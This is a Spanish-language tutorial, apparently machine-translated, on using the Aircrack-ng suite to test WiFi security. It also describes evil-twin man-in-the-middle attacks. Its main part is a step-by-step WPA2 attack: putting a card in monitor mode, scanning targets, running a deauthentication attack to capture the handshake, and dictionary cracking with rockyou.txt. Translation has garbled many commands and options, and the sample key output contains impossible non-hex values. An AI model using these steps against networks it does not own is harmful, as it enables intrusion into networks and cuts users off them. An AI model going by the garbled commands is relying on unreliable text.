Cómo utilizar Aircrack-ng

How Use Aircrack Ng



La mayoría de las veces, las personas nunca piensan en la red a la que están conectadas. Nunca piensan en cuán segura es esa red y cuánto arriesgan sus datos confidenciales a diario. Puede ejecutar comprobaciones de vulnerabilidad en sus redes wifi utilizando una herramienta muy poderosa llamada Aircrack-ng y Wireshark. Wireshark se usa para monitorear la actividad de la red. Aircrack-ng es más como una herramienta agresiva que te permite piratear y dar acceso a conexiones inalámbricas. Pensar como un intruso siempre ha sido la forma más segura de protegerse contra un ataque. Es posible que pueda comprender las acciones exactas que tomará un intruso para obtener acceso a su sistema al aprender sobre aircrack. Luego, puede realizar verificaciones de cumplimiento en su propio sistema para asegurarse de que no sea inseguro.

Aircrack-ng es un conjunto completo de software diseñado para probar la seguridad de la red WiFi. No es solo una herramienta, sino una colección de herramientas, cada una de las cuales tiene un propósito particular. Se pueden trabajar diferentes áreas de seguridad wifi, como monitorear el punto de acceso, probar, atacar la red, descifrar la red wifi y probarla. El objetivo clave de Aircrack es interceptar los paquetes y descifrar los hash para romper las contraseñas. Es compatible con casi todas las nuevas interfaces inalámbricas. Aircrack-ng es una versión mejorada de un conjunto de herramientas obsoleto Aircrack, ng se refiere a la Nueva generación . Algunas de las increíbles herramientas que funcionan juntas para realizar una tarea más grande.







Airmon:

Airmon-ng está incluido en el kit aircrack-ng que coloca la tarjeta de interfaz de red en modo monitor. Las tarjetas de red generalmente solo aceptarán paquetes dirigidos a ellas según lo definido por la dirección MAC de la NIC, pero con airmon-ng, también se aceptarán todos los paquetes inalámbricos, ya sea que estén dirigidos a ellos o no. Debería poder capturar estos paquetes sin vincularlos ni autenticarse con el punto de acceso. Se utiliza para comprobar el estado de un punto de acceso poniendo la interfaz de red en modo monitor. En primer lugar, hay que configurar las tarjetas inalámbricas para activar el modo de monitor, luego matar todos los procesos en segundo plano si cree que algún proceso está interfiriendo con él. Después de terminar los procesos, se puede habilitar el modo de monitorización en la interfaz inalámbrica ejecutando el siguiente comando:



[correo electrónico protegido]: ~ $sudoairmon-ng start wlan0#

También puede deshabilitar el modo de monitor al detener el airmon-ng en cualquier momento usando el siguiente comando:

[correo electrónico protegido]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng se utiliza para enumerar todas las redes que nos rodean y para ver información valiosa sobre ellas. La funcionalidad básica de airodump-ng es rastrear paquetes, por lo que está esencialmente programado para capturar todos los paquetes que nos rodean mientras se pone en modo monitor. Lo ejecutaremos en todas las conexiones que nos rodean y recopilaremos datos como la cantidad de clientes conectados a la red, sus direcciones mac correspondientes, el estilo de cifrado y los nombres de los canales, y luego comenzaremos a apuntar a nuestra red objetivo.

Al escribir el comando airodump-ng y darle el nombre de la interfaz de red como parámetro, podemos activar esta herramienta. Enumerará todos los puntos de acceso, la cantidad de paquetes de datos, los métodos de cifrado y autenticación utilizados y el nombre de la red (ESSID). Desde el punto de vista de la piratería informática, las direcciones mac son los campos más importantes.

[correo electrónico protegido]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack se utiliza para descifrar contraseñas. Después de capturar todos los paquetes usando airodump, podemos descifrar la clave mediante aircrack. Rompe estas claves usando dos métodos PTW y FMS. El enfoque de PTW se realiza en dos fases. Al principio, solo se usan los paquetes ARP, y solo entonces, si la clave no se descifra después de la búsqueda, usa todos los demás paquetes capturados. Un punto positivo del enfoque de PTW es que no todos los paquetes se utilizan para el craqueo. En el segundo enfoque, es decir, FMS, utilizamos tanto los modelos estadísticos como los algoritmos de fuerza bruta para descifrar la clave. También se puede utilizar un método de diccionario.

Aireplay:

Airplay-ng introduce paquetes en una red inalámbrica para crear o acelerar el tráfico. Los paquetes de dos fuentes diferentes pueden ser capturados por aireplay-ng. El primero es la red en vivo y el segundo son los paquetes del archivo pcap ya existente. Airplay-ng es útil durante un ataque de desautenticación que tiene como objetivo un punto de acceso inalámbrico y un usuario. Además, puede realizar algunos ataques como el ataque de café con leche con airplay-ng, una herramienta que le permite obtener una clave del sistema del cliente. Puede lograr esto capturando un paquete ARP y luego manipulándolo y enviándolo de vuelta al sistema. El cliente entonces creará un paquete que puede ser capturado por airodump y aircrack descifra la clave de ese paquete modificado. Algunas otras opciones de ataque de airplay-ng incluyen chopchop, fragment arepreplay, etc.

Base Aerea:

Airbase-ng se utiliza para transformar la computadora de un intruso en un punto de conexión comprometido para que otros puedan conectarse. Con Airbase-ng, puede afirmar que es un punto de acceso legal y realizar ataques de intermediario en las computadoras que están conectadas a su red. Este tipo de ataques se denominan Evil Twin Attacks. Es imposible para los usuarios básicos discernir entre un punto de acceso legal y un punto de acceso falso. Por lo tanto, la amenaza de los gemelos malvados se encuentra entre las amenazas inalámbricas más amenazadoras que enfrentamos en la actualidad.

Airolib-ng:

Airolib acelera el proceso de piratería al almacenar y administrar las listas de contraseñas y el punto de acceso. El sistema de administración de bases de datos utilizado por este programa es SQLite3, que está disponible principalmente en todas las plataformas. El descifrado de contraseñas incluye el cálculo de la clave maestra por pares a través de la cual se extrae la clave transitoria privada (PTK). Usando el PTK, puede determinar el código de identificación del mensaje de trama (MIC) para un paquete dado y, teóricamente, encontrar que el MIC es similar al paquete, por lo que si el PTK estaba en lo correcto, el PMK también lo estaba.

Para ver las listas de contraseñas y las redes de acceso almacenadas en la base de datos, escriba el siguiente comando:

[correo electrónico protegido]: ~ $sudoairolib-ng testdatabase –stats

Aquí testdatabase es la base de datos a la que desea acceder o crear, y –stats es la operación que desea realizar en ella. Puede realizar varias operaciones en los campos de la base de datos, como dar la máxima prioridad a algún SSID o algo así. Para usar airolib-ng con aircrack-ng, ingrese el siguiente comando:

[correo electrónico protegido]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Aquí estamos usando las PMK ya calculadas almacenadas en el base de datos de prueba para acelerar el proceso de descifrado de contraseñas.

Rompiendo WPA / WPA2 usando Aircrack-ng:

Veamos un pequeño ejemplo de lo que aircrack-ng puede hacer con la ayuda de algunas de sus increíbles herramientas. Descifraremos la clave precompartida de una red WPA / WPA2 utilizando un método de diccionario.

Lo primero que debemos hacer es enumerar las interfaces de red que admiten el modo de monitor. Esto se puede hacer usando el siguiente comando:

[correo electrónico protegido]: ~ $sudoairmon-ng

Conjunto de chips de controlador de interfaz PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Podemos ver una interfaz; ahora, tenemos que poner la interfaz de red que hemos encontrado (wlx0) en modo monitor usando el siguiente comando:

[correo electrónico protegido]: ~ $sudoairmon-ng start wlx0

Ha habilitado el modo monitor en la interfaz llamada wlx0mon .

Ahora deberíamos comenzar a escuchar transmisiones de enrutadores cercanos a través de nuestra interfaz de red que hemos puesto en modo monitor.

[correo electrónico protegido]: ~ $sudoairodump-ng wlx0mon

CH5 ][Transcurrido:30s][ 2020-12-02 00:17



Balizas BSSID PWR#Data, # / s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -45 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:SER-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:DA:88:FA:38:02-68 28 2 0 1154e WPA2 CCMP PSK TP-Link_3802



Sonda de tramas perdidas de tasa PWR de la ESTACIÓN BSSID



E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31ANTES DE CRISTO:91: B5: F8: 7E: D5 -390e-1 1002 13

Nuestra red objetivo es Decifralo en este caso, que se está ejecutando actualmente en el canal 1.

Aquí, para descifrar la contraseña de la red de destino, necesitamos capturar un apretón de manos de 4 vías, que ocurre cuando un dispositivo intenta conectarse a una red. Podemos capturarlo usando el siguiente comando:

[correo electrónico protegido]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -en /hogar wlx0

-c : Canal

–Bss : Bssid de la red de destino

-en : El nombre del directorio donde se colocará el archivo pcap

Ahora tenemos que esperar a que un dispositivo se conecte a la red, pero hay una mejor manera de capturar un apretón de manos. Podemos desautenticar los dispositivos al AP usando un ataque de desautenticación usando el siguiente comando:

[correo electrónico protegido]: ~ $sudoaireplay-ng-0 -aE4: 6F:13: 04: CE:31

a : Bssid de la red de destino

-0 : ataque de desautenticación

Hemos desconectado todos los dispositivos, y ahora tenemos que esperar a que un dispositivo se conecte a la red.

CH1 ][Transcurrido:30s][ 2020-12-02 00:02][Apretón de manos WPA: E4: 6F:13: 04: CE:31



Balizas BSSID PWR RXQ#Data, # / s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154 ° WPA2 CCMP PSK P



Sonda de tramas perdidas de tasa PWR de la ESTACIÓN BSSID



E4: 6F:13: 04: CE:31ANTES DE CRISTO:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:45: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708Decifralo

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Conseguimos un hit, y al mirar la esquina superior derecha justo al lado de la hora, podemos ver que se ha capturado un apretón de manos. Ahora busque en la carpeta especificada ( /hogar en nuestro caso) para un .pcap expediente.

Para descifrar la clave WPA, podemos usar el siguiente comando:

[correo electrónico protegido]: ~ $sudoaircrack-ng-a2 -enrockyou.txt-bE4: 6F:13: 04: CE:31apretón de manos.

b: Bssid de la red de destino

-a2: modo WPA2

Rockyou.txt: El diccionarioexpedienteusó

Handshake.cap: Elexpediente cualescontiene apretón de manos capturado

Aircrack-ng1.2beta3

[00:01:49] 10566llaves probadas(1017.96para/s)

LLAVE ENCONTRADA! [me tienes]

Llave maestra: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6F50C


Clave transitoria: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6F50C025 62E9 5D71

La clave de nuestra red objetivo se ha descifrado con éxito.

Conclusión:

Las redes inalámbricas están en todas partes, utilizadas por todas y cada una de las empresas, desde los trabajadores que usan teléfonos inteligentes hasta los dispositivos de control industrial. Según la investigación, casi más del 50 por ciento del tráfico de Internet será a través de WiFi en 2021.Las redes inalámbricas tienen muchas ventajas, la comunicación fuera de las puertas, el acceso rápido a Internet en lugares donde es casi imposible tender cables, pueden expandir la red sin instalar cables. para cualquier otro usuario, y puede conectar fácilmente sus dispositivos móviles a las oficinas de su hogar mientras usted no está allí.

A pesar de estas ventajas, existe un gran interrogante sobre su privacidad y seguridad. Como estas redes; dentro del rango de transmisión, los enrutadores están abiertos a todos, pueden ser atacados fácilmente y sus datos pueden verse comprometidos fácilmente. Por ejemplo, si está conectado a una red wifi pública, cualquiera que esté conectado a esa red puede verificar fácilmente el tráfico de su red con algo de inteligencia y con la ayuda de herramientas increíbles disponibles e incluso descargarlo.